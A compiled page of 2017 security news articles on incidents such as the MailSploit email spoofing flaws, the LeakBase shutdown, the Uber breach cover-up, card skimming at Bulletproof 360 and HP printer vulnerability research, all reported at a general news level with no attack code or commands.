- Hacking -

Last update 09.10.2017 13:52:27

Introduction  List  Kategorie  Subcategory 0  1  2  3  4  5  6  7  8  Hacker techniques



MailSploit — Email Spoofing Flaw Affects Over 30 Popular Email Clients
5.12.2017 thehackernews  Hacking


If you receive an email that looks like it's from one of your friends, just beware! It's possible that the email has been sent by someone else in an attempt to compromise your system.
A security researcher has discovered a collection of vulnerabilities in more than 30 popular email client applications that could allow anyone to send spoofed emails bypassing anti-spoofing mechanisms.
Discovered by security researcher Sabri Haddouche, the set of vulnerabilities, dubbed MailSploit, affects Apple Mail (macOS, iOS, and watchOS), Mozilla Thunderbird, several Microsoft email clients, Yahoo Mail, ProtonMail, and others.
Although most of these affected email client applications have implemented anti-spoofing mechanisms, such as DKIM and DMARC, MailSploit takes advantage of the way email clients and web interfaces parse "From" header.
Email spoofing is an old-school technique, but it works well, allowing someone to modify email headers and send an email with the forged sender address to trick recipients into believing they are receiving that email from a specific person.

 

In a dedicated website went up today, Haddouche explained how the lack of input sanitization implemented by vulnerable email clients could lead to email spoofing attack—without actually exploiting any flaw in DMARC.
To demonstrate this attack, Haddouche created a payload by encoding non-ASCII characters inside the email headers, successfully sending a spoofed email from an official address belonging to President of the United States.
"Using a combination of control characters such as new lines or null-byte, it can result in hiding or removing the domain part of the original email," Haddouche says in his blog post.

"We've seen a lot of malware spreading via emails, relying on social engineering techniques to convince users to open unsafe attachments, or click on phishing links. The rise of ransomware distributed over email clearly demonstrates the effectivity of those mechanisms."
Besides spoofing, the researcher found some of the email clients, including Hushmail, Open Mailbox, Spark, and Airmail, are also vulnerable to cross-site scripting (XSS) vulnerabilities, which stems from the email spoofing issue.
Haddouche reported this spoofing bug to 33 different client applications, 8 of which have already patched this issue in their products before the public disclosure and 12 are on their way to fix it.

Here you can find the list of all email and web clients (both patched and unpatched) that are vulnerable to MailSploit attack.
However, Mozilla and Opera consider this bug to be a server-side issue and will not be releasing any patch. Mailbird closed the ticket without responding to the issue, while remaining 12 vendors did not yet comment on the researcher's report.


Young Hacker, Who Took Over Jail Network to Get Friend Released Early, Faces Prison
5.12.2017 thehackernews  Hacking
Well, "a friend in need is a friend indeed" goes a long way, but in this case, this phrase hardly makes any sense.
A 27-year-old Michigan man who hacked into the government computer system of Washtenaw County Jail to alter inmate records and gain early release for his friend is now himself facing federal charges after getting caught.
Konrads Voits from Ann Arbor, Michigan, pleaded guilty in federal court last week for hacking into the Washtenaw County government computer system earlier this year using malware, phishing, and social engineering tricks in an attempt to get his friend released early from jail.
Prosecutors say Voits also used phone calls to prison staff claiming to be a manager at the County Jail's IT department and tricking them into downloading and running malware on their computers by visiting a phony website at "ewashtenavv.org," which mimics the Washtenaw official URL, "ewashtenaw.org."
Voit then obtained the remote login information of one of the Jail employees and used that information to install malware on the County's network and gain access to sensitive County's XJail system in March this year.
Gaining access to this system eventually allowed Voits to steal jail records of several inmates, search warrant affidavits and personal details, including passwords, usernames, and email addresses, of over 1,600 employees, along with altering electronic records of at least one inmate for early release.
However, things did not work as Voits wanted them to, and instead, they all backfired on him when jail employees detected changes in their records and alerted the FBI.
No prisoners were then released early.
This incident took place between January 24th, 2017 and March 10th, 2017 and cost Washtenaw County more than $235,000 to fix the whole mess before authorities busted Voits.
"Cyber intrusions affect individuals, businesses and governments. Computer hackers should realize that unlawfully entering another's computer will result in a felony conviction and a prison sentence," said the United States Attorney Daniel Lemisch.
"We applaud the dedication of so many hard-working law enforcement officers to take away this man's [Voits] ability to intrude into the computer systems of others."
Voits was arrested by the authorities a month later and pleaded guilty last week. He is now facing a fine of up to $250,000 and a maximum sentence of ten years prison, though he is unlikely to receive the maximum sentence.
Voits has agreed to surrender his belongings used during the attack, including his laptop, four cellphones and an undisclosed amount of Bitcoin.
Voits is currently in federal custody and is set to face a sentencing hearing on 5 April 2018.


Hacked password service Leakbase shuts down, someone suspects it was associated to the Hansa seizure
5.12.2017 securityaffairs  Hacking

LeakBase, an online service that provided paid access to leaked credentials, was shut down over the weekend, what has happened?
LeakBase, an online service that provided paid access to leaked credentials, was shut down over the weekend and started redirecting to the data breach notification website HaveIBeenPwned.

2 Dec

LeakBase
@LeakbasePW
This project has been discontinued, thank you for your support over the past year and a half.


LeakBase
@LeakbasePW
We understand many of you may have lost some time, so in an effort to offer compensation please email, refund@leakbase.pw
Send your LeakBase username and how much time you had left.
We will have a high influx of emails so be patient, this could take a while

3:38 AM - Dec 3, 2017
2 2 Replies 1 1 Retweet 2 2 likes
Twitter Ads info and privacy
The service started selling membership access in September 2016, claiming to provide access to two billion credentials resulting from major data leaks.


In January 2017, after launching the paid breach notification service, the LeakedSource went dark, apparently because it was raided by feds.

Leakbase

The popular investigator Brian Krebs associated the shutdown of the LeakBase service with the seizure of the Hansa black marketplace occurred in July, Krebs cited a source close to the matter.

“A source close to the matter says the service was taken down in a law enforcement sting that may be tied to the Dutch police raid of the Hansa dark web market earlier this year.” wrote Krebs.

Leakbase reportedly came under new ownership in April 2017, after it was hacked. According to the anonymous source cited by Krebs, the new owners of Leakbase dabbled in dealing illicit drugs at Hansa dark web marketplace.

“The Dutch police had secretly seized Hansa and operated it for a time in order to gather more information about and ultimately arrest many of Hansa’s top drug sellers and buyers. ” continues Krebs.

“According to my source, information the Dutch cops gleaned from their Hansa takeover led authorities to identify and apprehend one of the owners of Leakbase. This information could not be confirmed, and the Dutch police have not yet responded to requests for comment.”

Leakbase denied the accusation in this tweet:
LeakBase
@LeakbasePW
The fact that we need to tweet this is disappointing in its self, non of the LeakBase operators have any connections to Hansa.
The fact that this can be portrayed as near fact is astonishing as it is only a claim.

4:10 PM - Dec 4, 2017
2 2 Replies 4 4 Retweets 3 3 likes
Twitter Ads info and privacy
Regardless of whether a connection to Hansa exists, the ownership of these services could prove that their commercial activity aimed to help potential victims of data breaches and not to facilitating further crimes.


Leaked Credentials Service Shuts Down
5.12.2017 securityweek  Hacking
LeakBase, an online service that provided paid access to leaked credentials, was shut down over the weekend.

The service started selling membership access in September last year, claiming to provide access to two billion credentials that leaked in major hacking incidents. The service received a boost in January 2017, when paid breach notification service LeakedSource went dark.

LeakBase claimed to be providing users with information on leaked credentials to help them better understand the risks hacked information poses and to allow them to remedy the situation.

The leaked credentials, however, were leveraged for financial gain, as LeakBase visitors (the same as LeakedSource) had to pay for using the service. Subscribers were provided access to the entire database of leaked credentials and passwords.

A message posted on LeakBase’s Twitter account on Saturday is informing users that the service has been discontinued. In a subsequent tweet, the service’s operators said they were willing to refund users who had paid for access but couldn’t take advantage of the service anymore.

2 Dec

LeakBase
@LeakbasePW
This project has been discontinued, thank you for your support over the past year and a half.


LeakBase
@LeakbasePW
We understand many of you may have lost some time, so in an effort to offer compensation please email, refund@leakbase.pw
Send your LeakBase username and how much time you had left.
We will have a high influx of emails so be patient, this could take a while

3:38 AM - Dec 3, 2017
2 2 Replies 1 1 Retweet 2 2 likes
Twitter Ads info and privacy
Over the weekend, the service started redirecting users to haveibeenpwned.com, a breach alerting service created and maintained by security researcher Troy Hunt. HIBP allows users to check whether their email address appeared in a breach but doesn’t store the hacked passwords.

While the exact reasons behind the service’s shutdown haven’t been revealed as of now, security blogger Brian Krebs suggests that one of the owners of LeakBase was identified and apprehended due to their connection with the dark web marketplace Hansa.

The information that led to the arrest was supposedly provided by the Dutch police, which had secretly seized Hansa in July and operated it for a while to gather data on its users.

A tweet posted on LeakBase’s account several moments ago suggests that none of the LeakBase operators have any connections to Hansa.

4 Dec

LeakBase
@LeakbasePW
The fact that we need to tweet this is disappointing in its self, non of the LeakBase operators have any connections to Hansa.
The fact that this can be portrayed as near fact is astonishing as it is only a claim.


LeakBase
@LeakbasePW
If claims as simple as that hold such weight, than our claim, as stated above should hold equal if not much more power.

4:11 PM - Dec 4, 2017
Replies 2 2 Retweets 1 1 like
Twitter Ads info and privacy

Regardless of whether a connection to Hansa exists, the owners of services such as LeakBase could face criminal charges in the event prosecutors could prove that they intended to sell passwords to facilitate further crimes.


Hackers Target U.K. Shipping Giant Clarkson
29.11.2017 securityweek Hacking
Clarkson, one of the world’s largest providers of shipping services, informed the public on Tuesday that it has suffered a security breach and the hackers may release some data taken from its systems.

Clarkson provided only few details citing the ongoing law enforcement investigation, but the information it made public suggests that it was targeted by cybercriminals who tried to get the company to pay a ransom in order to avoid having its data leaked online.

The shipping giant said the attackers gained access to its systems using a single compromised user account, which has been disabled following the incident.

The company had been expecting the hackers to publish some data on Tuesday, but so far there haven’t been any reports of that happening.

“As a responsible global business, Clarksons has been working with the police in relation to this incident,” Clarkson said in a statement. “In addition, the data at issue is confidential and lawyers are on standby wherever needed to take all necessary steps to preserve the confidentiality in the information.”

Clarkson has started notifying affected customers and individuals. The organization claims it has been conducting a cybersecurity review of its systems and it plans on rolling out new IT security measures – in addition to the ones introduced in response to this security incident.

“As you would rightly expect, we’re working closely with specialist police teams and data security experts to do all we can to best understand the incident and what we can do to protect our clients now and in the future,” said Andi Case, CEO of Clarkson. “We hope that, in time, we can share the lessons learned with our clients to help stop them from becoming victims themselves. In the meantime, I hope our clients understand that we would not be held to ransom by criminals, and I would like to sincerely apologise for any concern this incident may have understandably raised.”

While Clarkson may have refused to pay the ransom demanded by the attackers, there are plenty of companies willing to pay up in order to avoid having to deal with a data breach becoming public knowledge.

Some studies have shown that 40% of businesses have paid the ransom demanded by hackers. Others studies said 70% accepted to pay, and half of them coughed up more than $10,000. One example is a Hollywood hospital that last year paid $17,000 to recover files encrypted by a piece of ransomware.

Some organizations attempt to negotiate with the attackers. HBO reportedly offered $250,000 to hackers who demanded millions of dollars, but the offer was not accepted. A South Korean web hosting provider also negotiated with cybercriminals, but still ended up paying $1 million after over 150 of its Linux servers were compromised.


Hackers can easily target container ships by hacking load plans due to its vulnerable messaging system
28.11.2017 securityaffairs Hacking

Ship loading and container load plans are vulnerable to hack because are created without using a secure messaging system.
Transportation is not immune from hacking attacks, aircraft and vessels can be compromised by cyber criminals and nations state actors exactly like any other system.

Today let’s speak about ship loading and container load plans that are vulnerable to hack because are created without using a secure messaging system.

Electronic messages that are exchanged between the entities responsible for these activities include a huge quantity of information that could be used by ill-intentioned to to target naval transportation entities, including shipping lines, terminals, and port authorities.

Large vessels rely a system called BAPLIE to displace thousands of containers, it is used to inform port authorities where to place every single container, and it is regularly updated by ship’s manufacturers.

Load plans

Researchers at the security firm Pen Test Partners who analyzed BAPLIE discovered that if customers do not use the latest version are open to cyber attacks that can allow crooks to send fake container’s data to the customs (obscure the real contents and weight of the load).

This information is used by port authorities and law enforcement to choose which containers have to be examined, altering data could allow criminal organizations to avoid controls.

The attackers could be interested in manipulating container weight and ship balance to make the ship more and more unstable as heavy goods are inadvertently loaded in the wrong position of the vessels.

“Criminals less interested in destabilising ships but perhaps instead stealing goods by rerouting containers, would use COPRAR / COPARN / CODECO / COARRI messages instead. These deal with shipping line to terminal messaging and vice versa.” reads the post published by Pen Test Partners.

“There’s evidence to suggest that ship and terminal messaging systems have been exploited in the past for routing drugs and theft of valuables.”

The experts at Pen Test Partners warned about the transmission channel used to send load plans from the ship to the port, they discovered that in many cases the personnel involved in the operations use USB devices for exchanging data between ship and terminal.

This procedure opens the door to a malware-based attack because the computer having load plan software might also be used for surfing the web or emailing.

Researcher claims that interoperability is vital between shipload plan and the various ports that it visits so that the load plan is securely transmitted to the port.

“Interoperability between the ship load plan and the hundreds of ports it may visit is essential – this leads to a race to the bottom in terms of securing and transmitting the load plan to the port. Simple = USB = vulnerable” states a separate report published by the security firm.

“This is ripe for attack. The consequences are financial, environmental and possibly even fatal.”

The manipulation of load plans could have dramatic impact on the shipping lines, operators, terminals and ports have to continuously assess their infrastructure, including messaging systems.


Bulletproof 360 website was hacked. Personal and financial data exposed
28.11.2017 securityaffairs Hacking

The website of the coffee vendor Bulletproof 360 was infected with a malware that stole customers’ financial and personal data.
The firm Bulletproof 360, Inc. manufactures coffee and tea products, and dietary supplements for upgrading mind and body. It serves customers online, as well as through stores in the United States and internationally.

The company specializing in butter-infused coffee confirmed that the attackers injected malicious code into its website stealing payment card details for months.

Bulletproof 360 Inc. revealed that from May 20 to October 19, except on October 14, crooks have stolen personal and financial information customers entered on its website.

Stolen data included bank card numbers, expiration dates, and security codes (CVV), as well as names, postal addresses, and email addresses.

Bulletproof 360
Bulletproof Coffee Cold Brew ready to go (PRNewsfoto/Bulletproof 360, Inc.)

The security breach was discovered mid-October, but it was publicly disclosed only on Monday to California officials, in compliance with the US state’s security breach notification laws.

“In mid-October 2017, Bulletproof identified unauthorized computer code that had been added to the software that operates the checkout page at www.bulletproof.com. When we discovered the unauthorized code, we immediately removed it and began an investigation. We have been working with leading computer security firms to examine our systems. We have also been working with law enforcement.” reads the letter sent by the company to the customers.
“Based on our investigation, we determined that the unauthorized code may have been capable of capturing information entered during the checkout process during the period from May 20, 2017 through October 13, 2017 and October 15-19, 2017. You are receiving this notice because your payment card may have been entered on the checkout page during this time period. “

Bulletproof 360 announced it is working diligently to improve the security of its systems and has vowed to prevent future similar security breach.

The company is inviting its customers to remain vigilant to the possibility of fraud by reviewing their payment card account statements for any unauthorized activity. The company said it will cover any costs associated with reimbursing fraudulent charges.

“If you incurred costs that your financial institution declined to reimburse related to fraudulent charges on a payment card you used for an online transaction with Bulletproof during the relevant time period, please contact us at the number below. We will reimburse you for any such reasonable, documented costs that your financial institution declined to pay” concludes the letter.

The company is known to consider cyber security as a pillar for its business, its CEO Dave Asprey worked at NetScaler, BlueCoat, and Trend Micro as a cloud security expert.


Gladius Shows Promise in Utilizing Blockchain Tech to Fight Hackers
27.11.2017 thehackernews  Hacking


Image Credit: Pixelbay
Blockchain startups are cropping up left and right aiming to disrupt existing services and business models.
These range from the trivial to potentially game-changing solutions that can revolutionize the internet as we know it. Among those that promise to change the world, most are attempting to reconstruct the entire internet infrastructure into something that is decentralized, secure, scalable, and tokenized.
There are also those that aim to solve the most significant problems plaguing the digital world, particularly potentially costly and tedious security issues. We do not lack for dangers, ranging from data breaches to denial-of-service attacks, and other hacks.
For the most part, there are capable SaaS and software-defined services that are capable enough in addressing the threats that involve malware and DDoS.
However, blockchains offer much much more.
The plague of DDoS
Distributed denial-of-service or DDoS attacks involve a malicious hacker deploying a network of infected computers in sending traffic and making queries to the target host. By deploying a botnet with potentially thousands of unique devices, it is difficult to block on a per-IP basis.
Oftentimes, without adequate protection, a DDoS attack can slow down a website or service to a crawl until it is no longer accessible either by running out of bandwidth allocation or simply being overwhelmed with traffic.
According to this DDos Impact survey, almost half of respondents say they have encountered a DDoS attack, with more than 90 percent of these businesses being attacked a span of 12 months.
The average DDoS attack lasted between 6 to 24 hours, and at the cost of $40,000 per hour, these cost businesses about $500,000 per attack on average, with some even costing more for larger enterprises.
For small businesses, the cost can be more severe, especially for those that depend solely on their online operations and sales to thrive.
These are only the costs associated with IT activity. When a website goes down, all its business goes down with it – this can be particularly troublesome for a company running an e-commerce website or a consumer-facing application.
Blockchain-based solutions for DDoS
Sadly, a DDoS attack is something that cannot be prevented. You can only mitigate its effects, and your infrastructure can merely ward off the excessive traffic and bandwidth utilization through several means. For the most part, deploying DDoS protection entails deflecting any botnet traffic, so that your main server or cloud deployment is not overloaded.
As earlier mentioned, cloud-based DDoS protection acts as a barrier between the main server and the internet-at-large Whenever an attack occurs, the service efficiently “absorbs” the traffic to minimize the impact on the infrastructure itself.
This can only go so far, however. Even the most robust of cloud infrastructures can just handle so much traffic. Besides, for businesses, the costs involved could be overwhelming.
Here is where a blockchain and a highly distributed approach can offer more value.
Gladius, a blockchain service for DDoS prevention and website acceleration aims to leverage on its global network of individual and independent nodes in mitigating the effects of a DDoS attack and caching content all across the world to make the website load faster.
Being a decentralized network, users can rent out their spare bandwidth through a desktop client and earn money by sharing their bandwidth. Then, their excess bandwidth is distributed to nodes which in turn funnel the bandwidth to websites under DDoS attacks to make sure they stay up.
During “peace time” or periods without a DDoS, Gladius’ network also speeds up access to the internet by acting as a content delivery network, wherein web content is cached for faster delivery to the target client’s browser.
The perks of a peer-to-peer network

Image Credit: Gladius
A decentralized network has additional benefits beyond the simple cloud-based deployment.
While a cloud is, to some extent, distributed, it is still owned by whoever runs the platform. In contrast, a blockchain runs completely off of a decentralized network, wherein the nodes are independently owned.
Herein lies the additional benefit.
With most blockchains, nodes are rewarded through a tokenized incentive scheme – it is the same with Gladius. Individual computer owners can earn cryptocurrency tokens whenever their resources are shared with the network.
Toward a decentralized sharing economy
Blockchain startups are representative of where we are heading in the future: a truly decentralized sharing economy. We have had a glimpse of such sharing economies with platforms like Uber, Airbnb, and the like.
However, these foster a sharing economy without the decentralized aspect – the platform is still owned by a corporate entity, for instance.
With blockchain startups, the sharing economy is built entirely upon the independent and decentralized nodes that make up the network.
Bitcoin proved that we could have an exchange of value through a decentralized system. Ethereum proved we could establish self-executing smart contracts without third parties or mediums.
With solutions like Gladius, we are likewise hopeful that the internet’s infrastructure can be disrupted for the benefit of both users and business that build value.


A Verge specific node wallets hacked, crooks stole $655,000 from CoinPouch XVG Verge wallets
27.11.2017 securityaffairs Hacking

CoinPouch publicly disclosed the hack of a Verge specific node wallets and the theft if $655,000 from its XVG Verge wallets.
A mystery surrounds the recent hack of CoinPouch wallet app, users lost over $655,000 worth of Verge cryptocurrency.

On Tuesday, the maintainers of the CoinPouch multi-currency wallet app published a statement that disclosed a security breach that affected its users who stored Verge currency in their wallets.

The project maintainers claimed the incident affected a Verge node set up with the help of Verge project maintainers to handle Verge transactions for Coin Pouch users.

“Users who held XVG Verge in Coin Pouch which was routed through the affected Verge Specific Node. Please note that at this time it appears that only Verge XVG wallets were affected. We have no information or customer reports to suggest that any other coins in CoinPouch were affected by this hack.” reads the announcement.

According to CoinPouch, a user reported having his Verge funds stolen on November 9. The results of the investigation conducted by the company along with the maintainers at the Verge project excluded the incident was caused by a cyber attack.

The Verge development team provided specific settings for CoinPouch’s Verge node that would improve its security, but evidently that modifications were not enough.

Even if the developers applied the changes suggested by the Verge team, a few days later some of its users reported problems with the Verge wallets.

“A few days later, we started getting additional reports from users stating their Verge wallets in Coinpouch were not working correctly. So, we contacted Justin again to investigate the issue.” continues the statement. “During that investigation, it was discovered that most Verge tokens on the Verge Specific Node had been transferred out which prompted us to immediately shut down the Verge Specific Node once we were able to confirm that it was a hack.”

CoinPouch publicly disclosed the hack and filed a complaint with law enforcement, it also hired a forensics lab to conduct further investigation.

“Users who held XVG Verge in CoinPouch which was routed through the affected Verge Specific Node. Please note that at this time it appears that only Verge XVG wallets were affected.” reads the Verge statement.”

We have contacted the company that hosted the Verge Specific Node to request the server for forensics analysis.
We have contacted a computer forensics lab to initiate forensics analysis.
We have reported the incident to the proper law enforcement authorities.”
CoinPouch

The good news is that the Verge team has traced the wallet used by the hackers to hijack the funds that was containing over 126 million Verge coins.

The maintainers at the Verge project took the distance from CoinPouch, claiming the company was never listed as a recommended wallet on its website and confirmed that it was removed from the site.

vergecurrency
@vergecurrency
To clarify situation and stop disinformation: It was 3rd party wallet @coinpouchapp that was hacked cos wasn't secured properly on their side. Not Verge blockchain. Independent forensic probe was ordered, as reported by #CoinPouch. Expect further status updates on their channels.

2:11 PM - Nov 23, 2017
37 37 Replies 145 145 Retweets 270 270 likes
Twitter Ads info and privacy
vergecurrency
@vergecurrency
CoinPouch iOS wallet has been removed from our website.#xvg #verge #coinpouch #vergecurrency

6:20 PM - Nov 22, 2017
21 21 Replies 64 64 Retweets 145 145 likes
Twitter Ads info and privacy
“This does not mean Verge was hacked nor does it mean Coinpouch was hacked. At this moment neither Coinpouch nor Justin, the founder and lead developer of Verge, are clear how the hack occurred.” said the Verge development.

“At this moment neither Coinpouch nor Justin, the founder and lead developer of Verge, are clear how the hack occurred,” said the company in a statement.


Over 400 Popular Sites Record Your Every Keystroke and Mouse Movement
23.11.2017 thehackernews  Hacking

How many times it has happened to you when you look for something online and the next moment you find its advertisement on almost every other web page or social media site you visit?
Web-tracking is not new.
Most of the websites log its users' online activities, but a recent study from Princeton University has suggested that hundreds of sites record your every move online, including your searches, scrolling behavior, keystrokes and every movement.
Researchers from Princeton University's Centre for Information Technology Policy (CITP) analyzed the Alexa top 50,000 websites in the world and found that 482 sites, many of which are high profile, are using a new web-tracking technique to track every move of their users.
Dubbed "Session Replay," the technique is used even by most popular websites, including The Guardian, Reuters, Samsung, Al-Jazeera, VK, Adobe, Microsoft, and WordPress, to record every single movement a visitor does while navigating a web page, and this incredibly extensive data is then sent off to a third party for analysis.
"Session replay scripts" are usually designed to gather data regarding user engagement that can be used by website developers to improve the end-user experience.

 

However, what's particularly concerning is that these scripts record beyond the information you purposely give to a website—which also includes the text you type out while filing a form and then delete before hitting 'Submit.'
"More and more sites use "session replay" scripts. These scripts record your keystrokes, mouse movements, and scrolling behaviour, along with the entire contents of the pages you visit, and send them to third-party servers," Princeton researcher Steven Englehardt wrote in a blog post under the No Boundaries banner.
"Collection of page content by third-party replay scripts may cause sensitive information such as medical conditions, credit card details and other personal information displayed on a page to leak to the third party as part of the recording. This may expose users to identity theft, online scams, and other unwanted behaviour."
Most troubling part is that the information collected by session replay scripts cannot "reasonably be expected to be kept anonymous." Some of the companies that provide session replay software even allow website owners to explicitly link recordings to a user's real identity.
Services Offering Session Replay Could Capture Your Passwords

The researchers looked at some of the leading companies, including FullStory, SessionCam, Clicktale, Smartlook, UserReplay, Hotjar, and Yandex, which offer session replay software services, and found that most of these services directly exclude password input fields from recording.
However, most of the times mobile-friendly login forms that use text inputs to store unmasked passwords are not redacted on the recordings, which ends up revealing your sensitive data, including passwords, credit card numbers, and even credit card security codes.
This data is then shared with a third party for analysis, along with other gathered information.
"We found at least one website where the password entered into a registration form leaked to SessionCam, even if the form is never submitted," the researcher said.
The researchers also shared a video which shows how much detail these session recording scripts can collect on a website's visitor.
World's Top Websites Record Your Every Keystroke
There are a lot of significant firms using session replay scripts even with the best of intentions, but since this data is being collected without the user's knowledge or visual indication to the user, these websites are just downplaying users' privacy.
Also, there is always potential for such data to fall into the wrong hands.
Besides the fact that this practice is happening without people's knowledge, the people in charge of some of the websites also did not even know that the script was implemented, which makes the matter a little scary.
Companies using such software included The Guardian, Reuters, Samsung, Al-Jazeera, VK, Adobe, Microsoft, WordPress, Samsung, CBS News, the Telegraph, Reuters, and US retail giant Home Depot, among many others.
So, if you are logging in one of these websites, you should expect that everything you write, type, or move is being recorded.


Uber in Legal Crosshairs Over Hack Cover-up
23.11.2017 securityweek  Hacking
Two US states on Wednesday confirmed they are investigating Uber's cover-up of a hack at the ride-sharing giant that compromised the personal information of 57 million users and drivers.

Uber purportedly paid data thieves $100,000 to destroy the swiped information -- and remained quiet about the breach for a year.

That decision evidently came despite a promise by the firm to "adopt leading data security protection practices" in a settlement with New York attorney general Eric Schneiderman.

Schneiderman and his counterpart in Connecticut, George Jepsen, on Wednesday told AFP that Uber is the target of probes in their states over the hidden hack.

"None of this should have happened, and I will not make excuses for it," Uber chief executive Dara Khosrowshahi, who took over at the company in August, said Tuesday.

Two members of the Uber information security team who "led the response" that included not alerting users about the data breach were let go from the San Francisco-based company effective Tuesday, according to Khosrowshahi.

The Uber chief said he only recently learned that outsiders had broken into a cloud-based server used by the company for data and downloaded a "significant" amount of information.

Stolen files included names, email addresses, and mobile phone numbers for riders, and the names and driver license information of some 600,000 drivers, according to Uber.

Uber paid the hackers $100,000 to destroy the data, not telling riders or drivers whose information was at risk, according to a source familiar with the situation.

Co-founder and ousted chief Travis Kalanick was advised of the breach shortly after it was discovered, but it was not made public until Khosrowshahi learned of the incident, the source confirmed.

In early 2016, Schneiderman announced a settlement with Uber stemming from an investigation into the company's handling and protection of riders' personal information.

The probe was prompted by word of a hack, and by reports that Uber executives were able to track the locations of riders in real-time using a tool known internally as "God View."

The settlement required Uber to better protect rider data, and pay $20,000 for failing to tell drivers about the 2014 data breach in a timely manner.


Experts found a way to exploit HP Enterprise printers to hack into company networks
23.11.2017 securityaffairs Hacking

Researchers at FoxGlove Security have found a potentially serious remote code execution vulnerability in some of HP’s enterprise printers.
HP dedicates significant efforts in designing secure printing systems, a recent marketing campaign launched by the firm shows the dangers of vulnerable printers for corporate networks.

HP launched new enterprise LaserJet printers back in 2015 and introduced several security improvements across the time.

Experts from FoxGlove Security tested an HP PageWide Enterprise 586dn multi-functional printer (MFP) and an HP LaserJet Enterprise M553n printer.

HP printers hacking

The team used a hacking tool dubbed PRET (PRinter Exploitation Toolkit) developed by researchers from Ruhr-Universität Bochum in Germany.

At the time, the tool was used by the author to find security vulnerabilities in 20 printer models manufactured by Dell, Brother, Konica, Samsung, HP, OKI, and Lexmark.

cross-site printing 2

The printers were affected by flaws related to common printing languages, PostScript and PJL, used in most laser printers. The flaws are not a novelty, according to the experts, they have existed for decades.

Now experts from FoxGlove used the PRET tool to find a path traversal flaw that allowed them to access the content of any print job, including those jobs protected by a PIN code. The same team found vulnerabilities that can be exploited by attackers to manipulate the content of print jobs and reset devices to factory settings.

In order to find a remote code execution (RCE) the researchers reverse engineered the firmware extracted from the HP printer, bypassing anti-tampering mechanisms implemented by the vendor.

The team analyzed firmware updates and HP Software Solutions discovering they leverages the OXP platform and SDK to extend a printer’s functionality. Both Solutions and firmware updates are delivered as a single bundle (.BDL) file that must be digitally signed.

“PJL is a language that computers will speak with the printer when submitting print jobs. This language has also been extended to have the ability of performing some administrative tasks.” stated the analysis published by the experts.

“One of the capabilities of PJL is very limited management of files on the printer. For example, it is possible to store and delete files, but only in a very specific location, a small “jail” on the filesystem that it should not be possible for a user speaking PJL to escape from:”

The experts failed to upload a malicious firmware to the device due to the signature validation checks, but they devised possible attack vectors.

“A BDL file modified in this way was uploaded to the printer and confirmed working, however no malicious changes to code could be implemented just yet. When we tried to replace any of the DLL files in the ZIP we began getting DLL signature validation errors.” continues the analysis.

The researchers succeeded in cracking signature validation for Solutions files and uploading a malicious DLL and execute arbitrary code.

The experts shared the source code of the tools used during the tests, including the proof-of-concept (PoC) malware the exploited.

The team reported the discovery to HP on August 21 and the tech giant is committed to release a security update this week.


Has Everyone Really Been Hacked?
22.11.2017 securityweek  Hacking
There is little doubt that fear sells security products, hikes law enforcements agency (LEA) budgets and sells newspapers. Both the security industry and government agencies benefit from sensational headlines; leaving people wondering what the real truth may be. So when UK newspaper The Times ran a headline, 'Everyone has been hacked, say police', it leaves the question, is this just more scaremongering or a true reflection on the state of security?

To my knowledge and belief, I have not been hacked (yet) -- so the headline is patently untrue. But I (and indeed everyone) am frequently targeted; I'm fairly certain I have dozens of unclicked malicious links and files in my mail system. Here's the first method of scaremongering: security vendors, LEAs and parts of the media will often claim, 'millions of users hit by new malware'. The truth is most likely that millions of users have been targeted or can potentially be affected, not that millions of users have been infected.

The Times headline is very clear: everyone has been hacked. But this is not what the police actually said. According to The Times' own report, "Virtually everyone in the country is likely to have had their personal data hacked and placed for sale on the dark web, police have said."

This is bad enough, but it is not the same as being personally hacked. What the police (in this case Peter Goodman, the National Police Chiefs' Council lead for cybercrime and the Chief Constable for Derbyshire) is saying is that everybody will have had some personal data taken by cybercriminals via third party breaches (such as Yahoo, LinkedIn, TalkTalk and more recently Equifax). Whether the amount of personal data stolen in this way is more or less than the personal data we willingly give to Google, Microsoft and Facebook is a separate -- but equally valid -- question.

Nor do we know what personal data has been stolen -- some personal data is clearly more valuable to cybercriminals (and dangerous to us) than other personal data. However, we should never dismiss any data loss as being unimportant. Cybercriminals, and especially state-affiliated criminals, have as much ability to use big data correlation and analysis as the big security vendors and government agencies. Little bits of data from different sources can be matched together to form a surprisingly detailed picture of us.

The question then remains, how accurate is the police view that we have all been affected by third-party data loss?

Chris Morales, head of security analytics at Vectra, comments, "Anyone who has performed any online transaction has personal data on the internet. Even worse, personal information exists in locations people are not even aware of or have any control over.

Equifax impacted more than 145 million consumers. Of those, around 700,000 were believed to be in the UK. That is just one recent breach.

Based on data reported from breachlevelindex.com [a site sponsored by Gemalto], there have been 9,198,580,293 data records lost or stolen since 2013. That's more data records than people in the world. For the UK specifically, they report a number of 137,516,163 records stolen since 2013, double the population. Therefore, it is a reasonable assumption to make that everyone has been hacked and some more than once." (Notice that Morales accepts the Times' use of the term 'hacked'.)

Chris Roberts, chief security architect at Acalvio, takes a similar stance. "Healthcare has lost between 600 and 700 million records since we started counting," he told SecurityWeek. "That's almost twice the population of the United States. Between all the various high visibility breaches and government losses, it's arguable that everyone's data is already out there. Finally, the quantity of credit cards that are breached on an annual basis would arguably demonstrate that almost everyone has had financial breaches."

Ilia Kolochenko, disagrees with the headline, but agrees with the content. "Digitization has become an inalienable part of our everyday lives," he told SecurityWeek. "Even people who have never used a PC or a smartphone have their personal data stored and processed somewhere. Cybercrime is skyrocketing, and the vast majority of digital systems have been breached. However, I think that it's technically incorrect to say that every person was hacked, as our common notion of "hack" implies at least some motive and targeting. Otherwise, we can reasonable say that every person in the world has been hacked many times over."

He has concerns over the headline, but has no issue with the content. "In the matter of general awareness, such announcements are beneficial, as many people still seriously underestimate the growing hydra of cybercrime. Hopefully, the government will finally allocate additional resources that are necessary to fight cybercrime on national and international levels. Right now, law enforcement is seriously under-equipped with technology, qualified personnel and financial resources to prevent, investigate and prosecute digital crime."

The general consensus is that (apart from the headline), the views of Peter Goodman do not represent scaremongering. Stephen Burke, founder and CEO of Cyber Risk Aware adds a rider: "There is a high percentage of people that have been affected by cybercrime -- however, it would be unfair to say that everyone has been a victim. It's possible they could be by virtue of the data that is readily available online and the data that they give out via social media and to companies who handle billing. If this were the case, then there would be too much data for hackers to handle."

Nevertheless, statistics suggest that everyone, from corporate manager to stay-at-home mum and her kids, have had personal data stolen by cybercriminals. Goodman has his own solution: "Mr Goodman said that providing lifetime security for digital devices should be mandatory," says the Times.

